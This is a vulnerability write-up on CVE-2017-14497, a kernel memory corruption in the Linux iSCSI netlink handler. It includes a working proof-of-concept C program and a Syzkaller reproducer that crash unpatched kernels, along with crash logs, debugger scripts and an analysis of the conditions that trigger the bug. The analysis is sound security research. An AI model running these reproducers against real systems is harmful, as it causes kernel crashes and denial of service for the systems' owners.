CVE-2017-14497
Introduction
I have recently been researching Linux kernel vulnerabilities and kernel fuzzing. CVE-2017-14497 is a Linux kernel Oops that affects kernels before Linux 4.13-rc2. This post gives a detailed analysis of the crash.
Crash POC
The POC has been released on exploit-db. After removing some redundant code, the full POC is as follows:
#include <sys/socket.h>
#include <linux/netlink.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h> /* getpid(), close() */

#define NETLINK_USER 31
#define MAX_PAYLOAD 1024 /* maximum payload size */

struct sockaddr_nl src_addr, dest_addr;
struct nlmsghdr *nlh = NULL;
struct iovec iov;
int sock_fd;
struct msghdr msg;

int main()
{
    sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);
    if (sock_fd < 0)
        return -1;

    memset(&src_addr, 0, sizeof(src_addr));
    src_addr.nl_family = AF_NETLINK;
    src_addr.nl_pid = getpid(); /* self pid */
    bind(sock_fd, (struct sockaddr *)&src_addr, sizeof(src_addr));

    memset(&dest_addr, 0, sizeof(dest_addr));
    dest_addr.nl_family = AF_NETLINK;
    dest_addr.nl_pid = 0;    /* For Linux Kernel */
    dest_addr.nl_groups = 0; /* unicast */

    nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
    memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
    nlh->nlmsg_len = 0xac;
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_flags = 0;

    /* 0x9c bytes of filler, then 0x10 as nlmsg_len of a trailing header */
    strcpy(NLMSG_DATA(nlh), "ABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\x10");

    iov.iov_base = (void *)nlh;
    iov.iov_len = 0xc0;
    msg.msg_name = (void *)&dest_addr;
    msg.msg_namelen = sizeof(dest_addr);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;

    printf("Sending message to kernel\n");
    sendmsg(sock_fd, &msg, 0);
    printf("Waiting for message from kernel\n");

    /* Read message from kernel */
    recvmsg(sock_fd, &msg, 0);
    printf("Received message payload: %s\n", (char *)NLMSG_DATA(nlh));
    close(sock_fd);
}
The crash output is as follows:
[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at 0000000000000028
[ 17.881586] IP: skb_release_data+0x77/0x110
[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0
[ 17.882743] Oops: 0002 [#1] SMP
[ 17.883123] Modules linked in:
[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1
[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000
[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110
[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202
[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX: ffffffff820f96a0
[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI: 000000000000000c
[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09: ffffc90000e13ad8
[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12: 0000000000000000
[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15: 0000000000000000
[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000) knlGS:0000000000000000
[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4: 00000000000006e0
[ 17.892629] Call Trace:
[ 17.892833] skb_release_all+0x1f/0x30
[ 17.893140] consume_skb+0x27/0x90
[ 17.893418] netlink_unicast+0x16a/0x210
[ 17.893735] netlink_sendmsg+0x2a3/0x390
[ 17.894050] sock_sendmsg+0x33/0x40
[ 17.894336] ___sys_sendmsg+0x29e/0x2b0
[ 17.894650] ? __wake_up_common_lock+0x7a/0x90
[ 17.895009] ? __wake_up+0xe/0x10
[ 17.895280] ? tty_write_unlock+0x2c/0x30
[ 17.895606] ? tty_ldisc_deref+0x11/0x20
[ 17.895925] ? n_tty_open+0xd0/0xd0
[ 17.896211] ? __vfs_write+0x23/0x130
[ 17.896512] __sys_sendmsg+0x40/0x70
[ 17.896805] ? __sys_sendmsg+0x40/0x70
[ 17.897133] SyS_sendmsg+0xd/0x20
[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94
[ 17.897783] RIP: 0033:0x7f7614886320
[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX: 00007f7614886320
[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI: 0000000000000003
[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09: 0000000000000000
[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000400b9e
[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15: 0000000000400b9e
[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83 c0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49
[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08
[ 17.903689] CR2: 0000000000000028
[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---
POC generated via Syzkaller
To get familiar with Linux syscall fuzzing, I fetched Syzkaller from GitHub. To reproduce the stack trace from the provided crash info, I built the Linux kernel with CONFIG_SCSI, CONFIG_SCSI_DMA and CONFIG_SCSI_NETLINK, and restricted the fuzzer to the following system calls in its configuration file:
"enable_syscalls":[ "socket$netlink", "bind", "getsockopt", "setsockopt", "sendmsg$netlink" ]
After fuzzing for about 42 hours on a 32-core machine, Syzkaller finally produced a crashing program, as follows:
#define _GNU_SOURCE
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

long r[23];

void loop()
{
    memset(r, -1, sizeof(r));
    r[0] = syscall(__NR_mmap, 0x20000000ul, 0x13000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
    r[1] = syscall(__NR_socket, 0x10ul, 0x3ul, 0x8ul);
    *(uint64_t*)0x2000b000 = (uint64_t)0x20000000;
    *(uint32_t*)0x2000b008 = (uint32_t)0x0;
    *(uint64_t*)0x2000b010 = (uint64_t)0x20000000;
    *(uint64_t*)0x2000b018 = (uint64_t)0x1;
    *(uint64_t*)0x2000b020 = (uint64_t)0x20005ee8;
    *(uint64_t*)0x2000b028 = (uint64_t)0x0;
    *(uint32_t*)0x2000b030 = (uint32_t)0x0;
    *(uint64_t*)0x20000000 = (uint64_t)0x20003f40;
    *(uint64_t*)0x20000008 = (uint64_t)0xbc;
    *(uint32_t*)0x20003f40 = (uint32_t)0xac;
    *(uint16_t*)0x20003f44 = (uint16_t)0x103;
    *(uint16_t*)0x20003f46 = (uint16_t)0x120;
    *(uint32_t*)0x20003f48 = (uint32_t)0x10001;
    *(uint32_t*)0x20003f4c = (uint32_t)0x5;
    memcpy((void*)0x20003f50, "\xa9\xef\x5b\x66\xf7\x45\xe4\x72\xc0\xa5\x9d\xa2\x87\xb2\xdd\xc5\xcc\x65\x11\xd4\xb5\xd9\x42\xd9\xde\x63\x84\x76\xaf\xbe\x75\x36\xff\xb2\xdf\xef\x5f\x91\x67\x4e\x6e\xc5\x85\xd2\x98\x49\x46\x6a\xea\xe5\x96\x24\xf9\x94\x1d\xb4\x1a\xc4\x7d\x59\xaa\xbe\x64\x07\xab\xcb\x5c\x78\x8c\x43\x52\xed\xd1\x82\xa7\x74\x5c\x54\xe4\xde\x75\xf7\x01\x6a\xf7\xb4\x9d\x17\xc2\xa3\x0d\x08\x1b\x39\x1f\xbc\x4b\xd8\x5a\x7f\xb2\x47\xa3\x8d\x55\x63\x5f\x14\x23\xb2\xfb\x1e\x59\xa3\x32\xac\xc5\x1e\x55\x3d\x6c\x69\xeb\x6c\xe1\x21\x46\x10\xe9\xfb\x7c\x8d\x70\xed\xe2\xd6\xeb\x90\x31\x7c\x7f\x7e\x7b\x87\x31\x55\xbc\xfc\x14\xf6\xa9\x1c\xbd\x1d\x1f\xec", 156);
    *(uint32_t*)0x20003fec = (uint32_t)0x10;
    *(uint16_t*)0x20003ff0 = (uint16_t)0x3;
    *(uint16_t*)0x20003ff2 = (uint16_t)0x400;
    *(uint32_t*)0x20003ff4 = (uint32_t)0x7ee33a38;
    *(uint32_t*)0x20003ff8 = (uint32_t)0x400;
    r[22] = syscall(__NR_sendmsg, r[1], 0x2000b000ul, 0x40ul);
}

int main()
{
    loop();
    return 0;
}
The crash output is as follows:
kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault: 0000 [#1] SMP KASAN
Dumping ftrace buffer:
(ftrace buffer empty)
Modules linked in:
CPU: 1 PID: 24691 Comm: syz-executor5 Not tainted 4.14.0-rc1 #2
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
task: ffff88003d540d00 task.stack: ffff88003ab20000
RIP: 0010:__read_once_size include/linux/compiler.h:276 [inline]
RIP: 0010:compound_head include/linux/page-flags.h:146 [inline]
RIP: 0010:put_page include/linux/mm.h:838 [inline]
RIP: 0010:__skb_frag_unref include/linux/skbuff.h:2760 [inline]
RIP: 0010:skb_release_data+0x242/0x6a0 net/core/skbuff.c:568
RSP: 0018:ffff88003ab27770 EFLAGS: 00010202
RAX: 1ffff1000d77501e RBX: ffff88006bba80f0 RCX: 00000000000001e0
RDX: 0000000000003a34 RSI: ffffc90003800000 RDI: 000000000001d1a0
RBP: ffff88003ab27840 R08: 0000000000000000 R09: ffff88003ab27448
R10: 000000003e587075 R11: 0000000094d1f72b R12: ffffed0007564efb
R13: dffffc0000000000 R14: 0000000000000000 R15: 000000000001d180
FS: 00007f159f65c700(0000) GS:ffff88003ed00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020000000 CR3: 000000006b9bb000 CR4: 00000000000006e0
Call Trace:
 skb_release_all+0x4a/0x60 net/core/skbuff.c:631
 __kfree_skb net/core/skbuff.c:645 [inline]
 consume_skb+0x11e/0x2c0 net/core/skbuff.c:705
 netlink_unicast_kernel net/netlink/af_netlink.c:1274 [inline]
 netlink_unicast+0x546/0x780 net/netlink/af_netlink.c:1299
 netlink_sendmsg+0xa22/0xe30 net/netlink/af_netlink.c:1862
 sock_sendmsg_nosec net/socket.c:633 [inline]
 sock_sendmsg+0xca/0x110 net/socket.c:643
 ___sys_sendmsg+0x714/0x900 net/socket.c:2049
 __sys_sendmsg+0xe5/0x210 net/socket.c:2083
 SYSC_sendmsg net/socket.c:2094 [inline]
 SyS_sendmsg+0x2d/0x50 net/socket.c:2090
 entry_SYSCALL_64_fastpath+0x13/0x94
RIP: 0033:0x451e59
RSP: 002b:00007f159f65bc08 EFLAGS: 00000216 ORIG_RAX: 000000000000002e
RAX: ffffffffffffffda RBX: 0000000000718000 RCX: 0000000000451e59
RDX: 0000000000000040 RSI: 000000002000b000 RDI: 0000000000000005
RBP: 00000000000038c0 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000216 R12: 00000000004ba0da
R13: 00000000ffffffff R14: 0000000020010000 R15: 0000000000001000
Code: ff e8 a3 83 36 fe 48 89 d8 48 c1 e8 03 42 80 3c 28 00 0f 85 38 04 00 00 4c 8b 3b 41 c6 04 24 00 49 8d 7f 20 48 89 fa 48 c1 ea 03 80 3c 2a 00 0f 85 10 04 00 00 41 80 3c 24 00 49 8b 57 20 0f
RIP: __read_once_size include/linux/compiler.h:276 [inline] RSP: ffff88003ab27770
RIP: compound_head include/linux/page-flags.h:146 [inline] RSP: ffff88003ab27770
RIP: put_page include/linux/mm.h:838 [inline] RSP: ffff88003ab27770
RIP: __skb_frag_unref include/linux/skbuff.h:2760 [inline] RSP: ffff88003ab27770
RIP: skb_release_data+0x242/0x6a0 net/core/skbuff.c:568 RSP: ffff88003ab27770
---[ end trace b4440a82b2a42fbe ]---
Kernel panic - not syncing: Fatal exception
Dumping ftrace buffer:
(ftrace buffer empty)
Kernel Offset: 0x18a00000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
Rebooting in 86400 seconds..
Crash Analysis
Crash Site Analysis
The crashing code is in net/core/skbuff.c, shown below:
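static void skb_release_data(struct sk_buff *skb)
{
    struct skb_shared_info *shinfo = skb_shinfo(skb);
    int i;

    if (skb->cloned &&
        atomic_sub_return(skb->nohdr ? (1 << SKB_DATAREF_SHIFT) + 1 : 1,
                          &shinfo->dataref))
        return;

    /* nr_frags is trusted here; a corrupted value walks past real frags */
    for (i = 0; i < shinfo->nr_frags; i++)
        __skb_frag_unref(&shinfo->frags[i]);

    if (shinfo->frag_list)
        kfree_skb_list(shinfo->frag_list);

    skb_zcopy_clear(skb, true);
    skb_free_head(skb);
}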
With some reverse engineering and a debugging script, I obtained the following information from kernel debugging:
set pagination off
break *0xffffffff8187cb3f
commands
p/x $r13
set $shinfo = (struct skb_shared_info*)($r13)
p/x *$shinfo
end
target remote :1234
ignore 1 2
cont
break *0xffffffff8187cb67
commands
x/i $rip
p/x $rdi
end
cont

//
Thread 1 hit Breakpoint 1, 0xffffffff8187cb3f in skb_release_data (skb=0xffff88007a428f40) at net/core/skbuff.c:567
567 for (i = 0; i < shinfo->nr_frags; i++)
$1 = 0xffff88007af13890
$2 = {_unused = 0xffea, nr_frags = 0xff, tx_flags = 0xff, gso_size = 0x0, gso_segs = 0x0, frag_list = 0x0, hwtstamps = {hwtstamp = 0x0}, gso_type = 0x0, tskey = 0x0, ip6_frag_id = 0x0, dataref = {counter = 0x1}, destructor_arg = 0xcf0, frags = {
  {page = {p = 0x600cf0}, page_offset = 0x600cf0, size = 0x0},
  {page = {p = 0x1e0}, page_offset = 0x1e0, size = 0x0},
  {page = {p = 0x8}, page_offset = 0x4, size = 0x4},
  {page = {p = 0x21c}, page_offset = 0x40021c, size = 0x0},
  {page = {p = 0x40021c}, page_offset = 0x44, size = 0x0},
  {page = {p = 0x44}, page_offset = 0x4, size = 0x0},
  {page = {p = 0x46474e550}, page_offset = 0xbf8, size = 0x0},
  {page = {p = 0x400bf8}, page_offset = 0x400bf8, size = 0x0},
  {page = {p = 0x2c}, page_offset = 0x2c, size = 0x0},
  {page = {p = 0x4}, page_offset = 0x6474e551, size = 0x6},
  {page = {p = 0x0}, page_offset = 0x0, size = 0x0},
  {page = {p = 0x0}, page_offset = 0x0, size = 0x0},
  {page = {p = 0x0}, page_offset = 0x8, size = 0x0},
  {page = {p = 0x0}, page_offset = 0x0, size = 0x0},
  {page = {p = 0x0}, page_offset = 0x0, size = 0x0},
  {page = {p = 0x0}, page_offset = 0x0, size = 0x0},
  {page = {p = 0x0}, page_offset = 0x0, size = 0x0}}}
Breakpoint 2 at 0xffffffff8187cb67: file ./arch/x86/include/asm/atomic.h, line 117.

Thread 1 hit Breakpoint 2, put_page (page=) at ./include/linux/mm.h:852
852 if (put_page_testzero(page))
=> 0xffffffff8187cb67 : lock decl 0x1c(%rdi)
$3 = 0xc

Memory layout:
0xffff88007af137d0: 0x00000000000000ac 0x00000acc00000000
0xffff88007af137e0: 0xffffffea00000067 0x6867666564636261
0xffff88007af137f0: 0x4847464544434241 0x6867666564636261
0xffff88007af13800: 0x4847464544434241 0x6867666564636261
0xffff88007af13810: 0x4847464544434241 0x6867666564636261
0xffff88007af13820: 0x4847464544434241 0x6867666564636261
0xffff88007af13830: 0x4847464544434241 0x6867666564636261
0xffff88007af13840: 0x4141414141414141 0x4141414141414141
0xffff88007af13850: 0x4242424242424242 0x4242424242424242
0xffff88007af13860: 0x4343434343434343 0x4343434343434343
0xffff88007af13870: 0x4444444444444444 0x0000001044444444
0xffff88007af13880: 0x0000000000000000 0x0000006700000000
0xffff88007af13890: 0x00000000ffffffea 0x0000000000000000
0xffff88007af138a0: 0x0000000000000000 0x0000000000000000
From the output of the debugging script, we can see that nr_frags was overwritten with 0xff. The next step is to locate where the memory corruption occurs.
Memory Corruption Analysis
According to the patch provided online [1], the corruption takes place in iscsi_if_rx in drivers/scsi/scsi_transport_iscsi.c:
static void iscsi_if_rx(struct sk_buff *skb)
{
    mutex_lock(&rx_queue_mutex);
    while (skb->len >= NLMSG_HDRLEN) {
        int err;
        uint32_t rlen;
        struct nlmsghdr *nlh;
        struct iscsi_uevent *ev;
        uint32_t group;

        nlh = nlmsg_hdr(skb);
        if (nlh->nlmsg_len < sizeof(*nlh) ||
            skb->len < nlh->nlmsg_len) {
            break;
        }

        ev = nlmsg_data(nlh);
        rlen = NLMSG_ALIGN(nlh->nlmsg_len);
        if (rlen > skb->len)
            rlen = skb->len;

        err = iscsi_if_recv_msg(skb, nlh, &group);
        if (err) {
            ev->type = ISCSI_KEVENT_IF_ERROR; //vulnerable here
            ev->iferror = err;
        }
        do {
            /*
             * special case for GET_STATS:
             * on success - sending reply and stats from
             * inside of if_recv_msg(),
             * on error - fall through.
             */
            if (ev->type == ISCSI_UEVENT_GET_STATS && !err)
                break;
            if (ev->type == ISCSI_UEVENT_GET_CHAP && !err)
                break;
            err = iscsi_if_send_reply(group, nlh->nlmsg_seq,
                                      nlh->nlmsg_type, 0, 0, ev, sizeof(*ev));
        } while (err < 0 && err != -ECONNREFUSED && err != -ESRCH);
        skb_pull(skb, rlen);
    }
    mutex_unlock(&rx_queue_mutex);
}

//skbuff.h
static inline unsigned char *skb_end_pointer(const struct sk_buff *skb)
{
    return skb->head + skb->end;
}

//netlink.h
static inline struct nlmsghdr *nlmsg_hdr(const struct sk_buff *skb)
{
    return (struct nlmsghdr *)skb->data;
}

static inline void *nlmsg_data(const struct nlmsghdr *nlh)
{
    return (unsigned char *) nlh + NLMSG_HDRLEN;
}

/* Relevant structure
struct nlmsghdr {
    __u32 nlmsg_len;
    __u16 nlmsg_type;
    __u16 nlmsg_flags;
    __u32 nlmsg_seq;
    __u32 nlmsg_pid;
};

struct iscsi_uevent {
    uint32_t type;
    uint32_t iferror;
    uint64_t transport_handle;
    union { } u;
    union { } r;
}
*/
After setting some breakpoints in the kernel, we can see how the memory corruption takes place.
//break condition before overwriting
$33 = "skb->len"
$34 = 0x14
$35 = 0xffff88007af1111c
$36 = "nlh->len"
$37 = 0xffff88007af1111c
$38 = 0x10
$39 = "ev"
0xffff88007af1112c: 0x0000000000000000 0x0000000000000000
0xffff88007af1113c: 0x0000000000000000 0x0000000000000000
0xffff88007af1114c: 0x0000000000000000 0x00000cf000000001
0xffff88007af1115c: 0x00600cf000000000 0x00600cf000000000

//break condition after overwriting
$50 = "skb->len"
$51 = 0x4
$52 = 0xffff88007af1112c
$53 = "nlh->len"
$54 = 0xffff88007af1112c
$55 = 0x67
$56 = "ev"
0xffff88007af1112c: 0xffffffea00000067 0x0000000000000000
0xffff88007af1113c: 0x0000000000000000 0x0000000000000000
0xffff88007af1114c: 0x0000000000000000 0x00000cf000000001
0xffff88007af1115c: 0x00600cf000000000 0x00600cf000000000
0xffff88007af1116c: 0x000001e000000000 0x000001e000000000
0xffff88007af1117c: 0x0000000800000000 0x0000000400000000
0xffff88007af1118c: 0x0000021c00000004 0x0040021c00000000
0xffff88007af1119c: 0x0040021c00000000 0x0000004400000000
Necessary Condition for the Crash
I tried to generalize the necessary conditions for the crash, as listed below:
- nlh->nlmsg_len = 0xac
- iov.iov_len > 0xac && iov.iov_len <= 0xc0
- *(NLMSG_DATA(nlh) + 0x9c) = "\x10" (this byte becomes the nlmsg_len of the trailing header at nlh + 0xac)
My manually written POC and the Syzkaller fuzzing result both satisfy the three conditions above. Interested readers can verify this conclusion with the help of a debugging script. According to the crash description given in [1], "skb->len == nlh->nlmsg_len and both are 0x10". However, I find that the actual condition is slightly looser: only nlh->nlmsg_len needs to be 0x10, and skb->len only needs to be larger than or equal to nlh->nlmsg_len.